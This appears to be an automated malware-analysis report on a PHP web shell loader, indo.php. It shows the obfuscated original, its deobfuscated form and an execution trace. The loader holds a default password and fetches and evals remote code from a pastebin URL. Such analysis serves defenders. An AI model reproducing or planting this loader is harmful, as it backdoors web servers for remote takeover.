indo.php

md5: 86b3c2604b8e5f65446196bdf32c2361

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Encoding
base64_decode (Deobfuscated, Original, Traces)

Execution
eval (Deobfuscated, Original, Traces)

Files
file_get_contents (Deobfuscated, Traces)

URLs
http://pastebin.com/raw/V3uuAY5T (Deobfuscated, Traces)

Deobfuscated PHP code
<?php

$auth_pass = "a0b4785be26dc9d534fa633e4c5cc5a3";
///Passs Default kontol900
eval /* PHPDeobfuscator eval output */ {
    $m3r1c4 = file_get_contents('http://pastebin.com/raw/V3uuAY5T');
    eval(gzinflate(base64_decode($m3r1c4)));
};
?>
</html>
Execution traces
data/traces/86b3c2604b8e5f65446196bdf32c2361_trace-1676251195.604.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:20:21.501771]
1	0	1	0.000137	393512
1	3	0	0.000191	395032	{main}	1		/var/www/html/uploads/indo.php	0	0
1		A						/var/www/html/uploads/indo.php	2	$auth_pass = 'a0b4785be26dc9d534fa633e4c5cc5a3'
2	4	0	0.000224	395032	base64_decode	0		/var/www/html/uploads/indo.php	3	1	'BcFbEoIgAADAf2+RKFFYli+msUKwjAyyEc1XFvc/RbsKHDV2BMqgA1hwmcfLThIQbtwi53dBx8kY6eK+iobt9XVYpTTOeJ322ZLzH7NUfgS2TZ5AN37e9K3NkvDgesojQs7T55siDGPmJ9X3EbxpxedFXwSxoxpDvbOlEiI9XhO6N2KzRlPcolYzCm8rqLfTnqWl03VY1BrK0h9YNMv8vjuVxYmP6GcZ6w8=\n'
2	4	1	0.000247	395320
2	4	R			'\005�[\022� \000\000�o�(QX�/��B��\f�\021�W\026�?E�\n\0345v\004ʠ\003Xp���N\022\020n�"�wA��\030�⾊��uX�4�x��ْ�\037�T~\004�M�@7~��͒��z�#B���"\fc�\'�\021�i��E_\004��\032C���\022"=^\023�7b�FSܢV3\no+��Ӟ���uX�\032��\037X4��;�ŉ��g\031�\017'
2	5	0	0.000287	395288	gzinflate	0		/var/www/html/uploads/indo.php	3	1	'\005�[\022� \000\000�o�(QX�/��B��\f�\021�W\026�?E�\n\0345v\004ʠ\003Xp���N\022\020n�"�wA��\030�⾊��uX�4�x��ْ�\037�T~\004�M�@7~��͒��z�#B���"\fc�\'�\021�i��E_\004��\032C���\022"=^\023�7b�FSܢV3\no+��Ӟ���uX�\032��\037X4��;�ŉ��g\031�\017'
2	5	1	0.000326	395544
2	5	R			'M#<S+$H(@&$#A2D]ZD0L7#3-%FCBIH?Z[``L%+XO4Y.EP9);?5@BR;X@\'BB_A\nMC<#""7N#ST/CTXU"A639%,M,7HL][\\^;(+&5A/6O^K2V?OB]!XF25$MT`?,>\nM67L,BR7?1`H-*([5U(USA?&G)&S.[1A;J$WW+HRS&LJ/YA4]LCI0=JF=BZ(_\n`\n'
2	6	0	0.000350	395256	convert_uudecode	0		/var/www/html/uploads/indo.php	3	1	'M#<S+$H(@&$#A2D]ZD0L7#3-%FCBIH?Z[``L%+XO4Y.EP9);?5@BR;X@\'BB_A\nMC<#""7N#ST/CTXU"A639%,M,7HL][\\^;(+&5A/6O^K2V?OB]!XF25$MT`?,>\nM67L,BR7?1`H-*([5U(USA?&G)&S.[1A;J$WW+HRS&LJ/YA4]LCI0=JF=BZ(_\n`\n'
2	6	1	0.000372	395480
2	6	R			'\r��\022� \030@�JOz�\v\027\r3E�8����\000\v\005/����pd��V\b�o�\a�/��\t{��C�ӍB�d�\024�L^�=�ϛ ��������~��\a��TKt\001�\036Y{\f�%�D\n\r(��ԍs��$l��\030[�M�.��\032ʏ�\025=�:Pv����?'
2	7	0	0.000420	395224	str_rot13	0		/var/www/html/uploads/indo.php	3	1	'\r��\022� \030@�JOz�\v\027\r3E�8����\000\v\005/����pd��V\b�o�\a�/��\t{��C�ӍB�d�\024�L^�=�ϛ ��������~��\a��TKt\001�\036Y{\f�%�D\n\r(��ԍs��$l��\030[�M�.��\032ʏ�\025=�:Pv����?'
2	7	1	0.000461	395416
2	7	R			'\r��\022� \030@�WBm�\v\027\r3R�8����\000\v\005/����cq��I\b�b�\a�/��\t{��P�ӍO�q�\024�Y^�=�ϛ ��������~��\a��GXg\001�\036L{\f�%�Q\n\r(��ԍf��$y��\030[�Z�.��\032ʏ�\025=�:Ci����?'
2	8	0	0.000505	395192	gzinflate	0		/var/www/html/uploads/indo.php	3	1	'\r��\022� \030@�WBm�\v\027\r3R�8����\000\v\005/����cq��I\b�b�\a�/��\t{��P�ӍO�q�\024�Y^�=�ϛ ��������~��\a��GXg\001�\036L{\f�%�Q\n\r(��ԍf��$y��\030[�Z�.��\032ʏ�\025=�:Ci����?'
2	8	1	0.000549	395416
2	8	R			'JG0zcjFjNCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9WM3V1QVk1VCcpOw0KZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkbTNyMWM0KSkpOw=='
2	9	0	0.000580	395224	base64_decode	0		/var/www/html/uploads/indo.php	3	1	'JG0zcjFjNCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9WM3V1QVk1VCcpOw0KZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkbTNyMWM0KSkpOw=='
2	9	1	0.000605	395448
2	9	R			'$m3r1c4 = file_get_contents(\'http://pastebin.com/raw/V3uuAY5T\');\r\neval(gzinflate(base64_decode($m3r1c4)));'
2	10	0	0.000646	396608	eval	1	'$m3r1c4 = file_get_contents(\'http://pastebin.com/raw/V3uuAY5T\');\r\neval(gzinflate(base64_decode($m3r1c4)));'	/var/www/html/uploads/indo.php	3	0
3	11	0	0.000670	396608	file_get_contents	0		/var/www/html/uploads/indo.php(3) : eval()'d code	1	1	'http://pastebin.com/raw/V3uuAY5T'
3	11	1	0.070238	399784
3	11	R			FALSE
2		A						/var/www/html/uploads/indo.php(3) : eval()'d code	1	$m3r1c4 = FALSE
3	12	0	0.070300	399744	base64_decode	0		/var/www/html/uploads/indo.php(3) : eval()'d code	2	1	FALSE
3	12	1	0.070323	399808
3	12	R			''
3	13	0	0.070341	399776	gzinflate	0		/var/www/html/uploads/indo.php(3) : eval()'d code	2	1	''
3	13	1	0.070372	399808
3	13	R			FALSE
2	10	1	0.070393	399776
1	3	1	0.070404	398312
			0.070448	317416
TRACE END   [2023-02-12 23:20:21.572109]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?php
$auth_pass = "a0b4785be26dc9d534fa633e4c5cc5a3";///Passs Default kontol900
eval(base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(("BcFbEoIgAADAf2+RKFFYli+msUKwjAyyEc1XFvc/RbsKHDV2BMqgA1hwmcfLThIQbtwi53dBx8kY6eK+iobt9XVYpTTOeJ322ZLzH7NUfgS2TZ5AN37e9K3NkvDgesojQs7T55siDGPmJ9X3EbxpxedFXwSxoxpDvbOlEiI9XhO6N2KzRlPcolYzCm8rqLfTnqWl03VY1BrK0h9YNMv8vjuVxYmP6GcZ6w8=
"))))))));
?>
</html>
PHP Malware Analysis

indo.php

md5: 86b3c2604b8e5f65446196bdf32c2361

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
